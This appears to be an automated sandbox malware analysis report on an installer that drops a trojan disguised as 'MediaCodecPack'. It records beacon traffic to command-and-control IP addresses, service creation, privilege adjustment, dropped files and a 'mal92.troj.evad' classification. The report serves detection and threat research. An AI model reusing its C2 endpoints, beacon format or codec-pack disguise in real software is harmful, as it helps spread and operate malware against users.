                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: 2_2_02B92B95 WSASetLastError,WSARecv,WSASetLastError,select | 2_2_02B92B95
                    Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 188.119.66.185
                    Source: steel.exe.3.tmp, 00000001.00000002.2981700405.0000000005C8C000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000000.1743322718.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, mediacodecpack3.exe.1.dr, MediaCodecPack.exe.2.dr, is-VED6B.tmp.1.dr | String found in binary or memory: http://wonderwork.ucoz.com/
                    Source: steel.exe.3.tmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
                    Source: steel.exe.3.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: steel.exe.3.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: steel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/ps
                    Source: steel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/psU
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/A654B8DF3C4585F17B60DA6690D18421A0182C8
                    Source: mediacodecpack3.exe, 00000002.00000002.2981066269.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000002.2981066269.000000000087E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4
                    Source: mediacodecpack3.exe, 00000002.00000002.2981066269.000000000089E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/en-GB
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ography
                    Source: mediacodecpack3.exe, 00000002.00000002.2981066269.000000000089E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/priseCertificates
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/rosoft
                    Source: steel.exe.3.exe, 00000000.00000003.1731421977.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000002.2980863339.0000000002161000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731515225.0000000002161000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000003.1733523612.0000000003130000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000003.1733603131.0000000002138000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000002.2981234148.0000000002138000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000002.2980978072.00000000005A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49786 version: TLS 1.2
                    Source: is-SHN24.tmp.1.dr | Binary or memory string: DirectDrawCreateExmemstr_3a485914-1
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0042F520 NtdllDefWindowProc_A | 1_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00423B84 NtdllDefWindowProc_A | 1_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004125D8 NtdllDefWindowProc_A | 1_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00478AC0 NtdllDefWindowProc_A | 1_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A | 1_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError | 1_2_0042E934
                    Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx | 0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx | 1_2_004555E4
                    Source: C:\Users\user\Desktop\steel.exe.3.exe Code function: 0_2_0040840C 0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_004706A8 1_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_004809F7 1_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_004352C8 1_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_004673A4 1_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_0043DD50 1_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_0043035C 1_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_004444C8 1_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_004345C4 1_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_00444A70 1_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_00486BD0 1_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_00430EE8 1_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_0045F0C4 1_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_00445168 1_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_0045B174 1_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_00469404 1_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_00445574 1_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_004519BC 1_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_00487B30 1_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_0048DF54 1_2_0048DF54
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_00401000 2_2_00401000
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_004067B7 2_2_004067B7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_609660FA 2_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6092114F 2_2_6092114F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6091F2C9 2_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6096923E 2_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6093323D 2_2_6093323D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6095C314 2_2_6095C314
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60950312 2_2_60950312
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6094D33B 2_2_6094D33B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6093B368 2_2_6093B368
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6096748C 2_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6093F42E 2_2_6093F42E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60954470 2_2_60954470
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_609615FA 2_2_609615FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6096A5EE 2_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6096D6A4 2_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_609606A8 2_2_609606A8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60932654 2_2_60932654
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60955665 2_2_60955665
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6094B7DB 2_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6092F74D 2_2_6092F74D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60964807 2_2_60964807
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6094E9BC 2_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60937929 2_2_60937929
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6093FAD6 2_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6096DAE8 2_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_6094DA3A 2_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60936B27 2_2_60936B27
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60954CF6 2_2_60954CF6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60950C6B 2_2_60950C6B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60966DF1 2_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60963D35 2_2_60963D35
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60909E9C 2_2_60909E9C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60951E86 2_2_60951E86
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60912E0B 2_2_60912E0B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_60954FF8 2_2_60954FF8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02BABAFD 2_2_02BABAFD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02BAD32F 2_2_02BAD32F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02BA70C0 2_2_02BA70C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02B9E07E 2_2_02B9E07E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02BAB609 2_2_02BAB609
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02BB267D 2_2_02BB267D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02BABF15 2_2_02BABF15
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02BA874A 2_2_02BA874A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02BB0DB4 2_2_02BB0DB4
                    Source: Joe Sandbox View Dropped File: C:\ProgramData\MediaCodecPack\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: String function: 02BB2A10 appears 135 times
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: String function: 02BA7760 appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: String function: 004460A4 appears 59 times
                    Source: steel.exe.3.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: steel.exe.3.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: steel.exe.3.tmp.0.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-67S07.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-67S07.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-67S07.tmp.1.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-5V918.tmp.1.dr Static PE information: Number of sections : 19 > 10
                    Source: sqlite3.dll.2.dr Static PE information: Number of sections : 19 > 10
                    Source: steel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs steel.exe.3.exe
                    Source: steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs steel.exe.3.exe
                    Source: steel.exe.3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engine Classification label: mal92.troj.evad.winEXE@5/26@0/2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_02B9F8D0 FormatMessageA,GetLastError,FormatMessageA,GetLastError, 2_2_02B9F8D0
                    Source: C:\Users\user\Desktop\steel.exe.3.exe Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 1_2_00455E0C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 2_2_00401CF9
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Code function: 1_2_0046E0E4 GetVersion,CoCreateInstance, 1_2_0046E0E4
                    Source: C:\Users\user\Desktop\steel.exe.3.exe Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource, 0_2_00409C34
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW, 2_2_00401951
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW, 2_2_00401951
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Code function: 2_2_0040DEE9 StartServiceCtrlDispatcherA, 2_2_0040DEE9
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp File created: C:\Users\user\AppData\Local\Programs
                    Source: C:\Users\user\Desktop\steel.exe.3.exe File created: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp
                    Source: Yara match File source: 2.0.mediacodecpack3.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000001.00000002.2981700405.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000000.1743204779.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara match File source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-VED6B.tmp, type: DROPPED
                    Source: Yara match File source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe, type: DROPPED
                    Source: Yara match File source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp File read: C:\Windows\win.ini
                    Source: C:\Users\user\Desktop\steel.exe.3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: mediacodecpack3.exe, mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: mediacodecpack3.exe, mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
